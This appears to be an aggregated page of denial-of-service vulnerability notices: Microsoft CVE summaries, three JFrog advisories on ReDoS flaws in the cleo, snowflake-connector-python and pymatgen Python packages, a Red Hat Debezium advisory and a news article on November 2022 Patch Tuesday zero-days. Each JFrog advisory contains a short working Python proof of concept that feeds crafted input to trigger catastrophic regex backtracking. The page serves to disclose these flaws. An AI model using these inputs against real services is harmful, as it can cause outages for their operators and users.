Windows Point-to-Point Tunneling Protocol Denial of Service Vulnerability. This CVE ID is unique from CVE-2022-41090.

CVE-2022-41116

Windows Hyper-V Denial of Service Vulnerability.

CVE-2022-38015

Windows Point-to-Point Tunneling Protocol Denial of Service Vulnerability. This CVE ID is unique from CVE-2022-41116.

CVE-2022-41090

Network Policy Server (NPS) RADIUS Protocol Denial of Service Vulnerability.

CVE-2022-41056

Windows Network Address Translation (NAT) Denial of Service Vulnerability.

CVE-2022-41058

An exponential ReDoS (Regular Expression Denial of Service) can be triggered in the cleo PyPI package, when an attacker is able to supply arbitrary input to the Table.set_rows method

CVE-2022-42966 | CVSS 5.9

JFrog Severity:medium

Published 15 Oct. 2022 | Last updated 15 Oct. 2022

Exponential ReDoS in cleo leads to denial of service

cleo

cleo (,)

An exponential ReDoS (Regular Expression Denial of Service) can be triggered in the cleo PyPI package, when an attacker is able to supply arbitrary input to the Table.set_rows method

    import time
    
    from cleo import ui
    from cleo.io.buffered_io import BufferedIO
    
    from cleo.ui.table import Table
    from cleo.ui.table_cell import TableCell
    from cleo.ui.table_separator import TableSeparator
    from cleo.ui.table_style import TableStyle
    from cleo.ui.table_cell_style import TableCellStyle
    
    
    
    
    def column_style(i):
        io = BufferedIO()
        table = Table(io)
        table.set_headers(["ISBN", "Title", "Author", "Price"])
    
        table.set_rows([
                    ["99921-58-10-7", "Divine Comedy", "Dante Alighieri"],
                    TableSeparator(),
                    [TableCell('<0=,' + '000=0'*i + '00=0>', colspan=3,style=TableCellStyle())],
                    TableSeparator(),
                    [TableCell("Arduino: A Quick-Start Guide", colspan=2), "Mark Schmidt"],
                    TableSeparator(),
                    ["9971-5-0210-0", TableCell("A Tale of \nTwo Cities", colspan=2)],
                ])
    
        style = TableStyle()
        style.set_pad_type("left")
        table.set_column_style(3, style)
        table.set_column_style(2, style)
    
        table.render()
    
    
    for i in range(1000):
        start = time.time()
        try:
            column_style(i)
        except:
            pass
        print(f"{i}: Done in {time.time() - start}")
    

No mitigations are supplied for this issue

NVD

CVE-2022-42966: cleo ReDoS | XRAY-257186

An exponential ReDoS (Regular Expression Denial of Service) can be triggered in the snowflake-connector-python PyPI package, when an attacker is able to supply arbitrary input to the get_file_transfer_type method

CVE-2022-42965 | CVSS 5.9

JFrog Severity:medium

Published 15 Oct. 2022 | Last updated 15 Oct. 2022

Exponential ReDoS in snowflake-connector-python leads to denial of service

snowflake-connector-python

snowflake-connector-python (,)

An exponential ReDoS (Regular Expression Denial of Service) can be triggered in the snowflake-connector-python PyPI package, when an attacker is able to supply arbitrary input to the get_file_transfer_type method

    import time
    from snowflake.connector.cursor import SnowflakeCursor
    
    for i in range(100):
        start_time = time.time()
        sql = '/**/\n' + '\t/*/get\t*/\t/**/\n'*i + '\t*/get\n'
        SnowflakeCursor.get_file_transfer_type(sql)
        print("--- %s seconds ---" % (time.time() - start_time))
    

No mitigations are supplied for this issue

NVD

CVE-2022-42965: snowflake-connector-python ReDoS | XRAY-257185

An exponential ReDoS (Regular Expression Denial of Service) can be triggered in the pymatgen PyPI package, when an attacker is able to supply arbitrary input to the GaussianInput.from_string method

CVE-2022-42964 | CVSS 5.9

JFrog Severity:medium

Published 15 Oct. 2022 | Last updated 15 Oct. 2022

Exponential ReDoS in pymatgen leads to denial of service

pymatgen

pymatgen (,)

An exponential ReDoS (Regular Expression Denial of Service) can be triggered in the pymatgen PyPI package, when an attacker is able to supply arbitrary input to the GaussianInput.from_string method

    import time
    from pymatgen.io.gaussian import GaussianInput
    
    def str_and_from_string(i):
        ans = """#P HF/6-31G(d) SCF=Tight SP
    
    H4 C1
    
    0 1
    """
        vulnerable_input = ans + 'C'+'0' * i + '!'+'\n'
        GaussianInput.from_string(vulnerable_input)
    
    for i in range(1000):
        start = time.time()
        str_and_from_string(i)
        print(f"{i}: Done in {time.time() - start}")
    

No mitigations are supplied for this issue

NVD

CVE-2022-42964: pymatgen ReDoS | XRAY-257184

Red Hat Security Advisory 2022-7896-01 - Debezium is a distributed platform that turns your existing databases into event streams, so applications can see and respond immediately to each row-level change in the databases. Debezium is built on top of Apache Kafka and provides Kafka Connect compatible connectors that monitor specific database management systems. Debezium records the history of data changes in Kafka logs, from where your application consumes them. This makes it possible for your application to easily consume all of the events correctly and completely. Even if your application stops unexpectedly, it will not miss anything: when the application restarts, it will resume consuming the events where it left off. Issues addressed include a denial of service vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Moderate: Red Hat Integration Debezium 1.9.7 security update  
Advisory ID:       RHSA-2022:7896-01  
Product:           Red Hat Integration  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:7896  
Issue date:        2022-11-09  
CVE Names:         CVE-2021-22569 CVE-2022-3171  
====================================================================  
1. Summary:

A security update for Debezium is now available for Red Hat Integration.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Description:

Debezium is a distributed platform that turns your existing databases into  
event streams, so applications can see and respond immediately to each  
row-level change in the databases.

Debezium is built on top of Apache Kafka and provides Kafka Connect  
compatible connectors that monitor specific database management systems.  
Debezium records the history of data changes in Kafka logs, from where your  
application consumes them. This makes it possible for your application to  
easily consume all of the events correctly and completely. Even if your  
application stops unexpectedly, it will not miss anything: when the  
application restarts, it will resume consuming the events where it left  
off.

Security Fix(es):

* protobuf-java: potential DoS in the parsing procedure for binary data  
(CVE-2021-22569)

* protobuf-java: timeout in parser leads to DoS (CVE-2022-3171)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

3. Solution:

To apply this update just follow standard installation procedure

https://access.redhat.com/documentation/en-us/red_hat_integration/2022.q4/html/installing_debezium_on_openshift/index  
https://access.redhat.com/documentation/en-us/red_hat_integration/2022.q4/html/installing_debezium_on_rhel/index

4. Bugs fixed (https://bugzilla.redhat.com/):

2039903 - CVE-2021-22569 protobuf-java: potential DoS in the parsing procedure for binary data  
2137645 - CVE-2022-3171 protobuf-java: timeout in parser leads to DoS

5. References:

https://access.redhat.com/security/cve/CVE-2021-22569  
https://access.redhat.com/security/cve/CVE-2022-3171  
https://access.redhat.com/security/updates/classification/#moderate  
https://access.redhat.com/jbossnetwork/restricted/listSoftware.html?downloadType=distributions&product=red.hat.integration&version 22-Q4

6. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY2v3otzjgjWX9erEAQhmmw/+NujxA03qhV4k8/pvL88Dazs3bt6ZH8ar  
ELY1Ueri1EgfWROfGB2+SKK2hbFNN+ft4iY2YWHhDX6PUAmVMPiaB0M8NCQkj7GW  
17Bo/muRWOti78J03+2314VxLwNHn+s2qCtAR3/Ks4bfcEDUMwsy/u3YTs+wtbK5  
tvO5s6uUPB2evIlliJuYKVfUFB9R900tZv44JZ2d+PC3R4S+dUcVTASRX8lDQMhx  
lOSxVePvV1rNTBJ0e7GaPCWNHR2eNSewpwI/XLhfBOh7ojIgNDUNCi69aEYyVLHW  
R7uh5R3+PFZvQX+mJ74qcQV2aYVQ4MnhKZrWqbkGyhMqHVRuF7d6DzXd2yMWVDWk  
vjgnu2NHR0SG/uRdA2Iykm0MGCq9/69KTo3C+nFEoDNg2vVdH155IInpAdpiw/zn  
iKOXcdQkrLyvClNz/giifooNm9/8HSYhI26ayOj/t+H0AGQfAGLfVHGbNQJ7y00W  
tSU1OfNPU53KCvbIk/l/3H4SOeXPbOb5pgXaEOM+8ssPk48aBSkQ5Ru7HrJOZwYY  
fU3652+qceb/IAWoHsGfW2UKOOLeyipD9i4rxhKaAQYtOsETGAoeqxF43e78VFBy  
y47unTuLhi0DyhZw+ZPKzit3j4VLTUTrB79JxyZQ+WZYXOU/ZUpwSkRwMqwjMm9Q  
+d4cGdgfQ7Y<J6  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-7896-01

By Deeba Ahmed
Microsoft has urged Windows Administrators to install the updates urgently so make sure you have the latest patches installed!
This is a post from HackRead.com Read the original post: Microsoft Issues Patches to Fix 6 Active 0-Day Windows Vulnerabilities

It is no surprise that Microsoft’s products are on the hit list of cyber attacks, given the steadily increasing number of **zero-day attacks against them**. It is the second time in two months that the reputed software maker has released patches to fix already exploited zero-days in its scheduled Patch Tuesday update. The company urged Windows Administrators to install the updates urgently.

 The details of these flaws and the subsequent fixes are as follows:

**Microsoft Fixes Crucial Flaws in Patch Tuesday Update**

According to the tech giant, in its monthly security update, Patch Tuesday, the company has released patches for 68 vulnerabilities, including six unique, actively exploited zero-days. These flaws were flagged in the Exploitation Category. This includes two fixes for **Exchange Server security flaws** that a state-sponsored entity exploited for several months.

Twelve flaws were marked Critical, two of which were rated High, whereas fifty-five were rated Important in severity. The company also released patches for weaknesses fixed the previous week by **OpenSSL**.

Microsoft separately fixed another actively exploited vulnerability, **CVE-2022-3723**. It was detected in Chromium-based browsers.

**Zero-Days Details**

Microsoft’s security response team described four new and already exploited zero-days tracked as **CVE-2022-41125**, **CVE-2022-41073**, **CVE-2022-41091**, and **CVE-2022-41128**.

The CVE-2022-41128 was detected by Google TAG’s Benoît Sevens and Clément Lecigne, found in the Jscript9 component. It occurred when the target was lured to visit a malicious website.

The CVE-2022-41091 is a security bypass flaw in Windows MoTW (Mark of the Web), which was recently discovered to be weaponized by the **Magniber ransomware** actor, and users were targeted with fake software updates. A malicious file could help the attacker evade MoTW defenses that lead to loss of integrity and security features like MS Office’s Protected View, **Microsoft’s advisory read**.

**Microsoft Exchange Server Vulnerabilities**

In addition, they also patched two Microsoft Exchange server flaws tracked as **CVE-2022-41040 and CVE-2022-41082**. These exploits were used for privilege escalation, RCE (remote code execution), and feature bypassing.

The first four flaws impacted the Windows CNG Key Isolation Service, the Windows Print Spooler, Windows Mark of the Web Security, and Windows Scripting Languages. The other two flaws that **affected Exchange Server** entailed an RCE, and a privilege escalation bug, which was actually part of an extended exploit chain that Microsoft believes was exploited by a state-sponsored threat actor.

According to Microsoft, due to security issues, at least ten organizations have been targeted. Both flaws are documented as SSRF (server-side request forgery) issues.

**Critical Vulnerabilities Fixed in November**

Other Critical-rated vulnerabilities were privilege escalation flaws discovered in Windows Kerberos RC4-HMAC (**CVE-2022-37966**), Kerberos (**CVE-2022-37967**), and Microsoft Exchange Server (**CVE-2022-41080**). Moreover, a denial-of-service flaw was also fixed that impacted Windows Hyper-V (**CVE-2022-38015**).

1.  **Chinese Hackers Hiding Malware in Windows Logo**
2.  **Hackers Abusing Microsoft Dynamics 365 Customer Voice**
3.  **Microsoft Office Most Exploited Software in Malware Attacks**
4.  **Apple Safari Safest, Google Chrome Riskiest Browser of 2022**
5.  **Scammers Leveraging Microsoft Team GIFs in Phishing Attacks**

Tag

#dos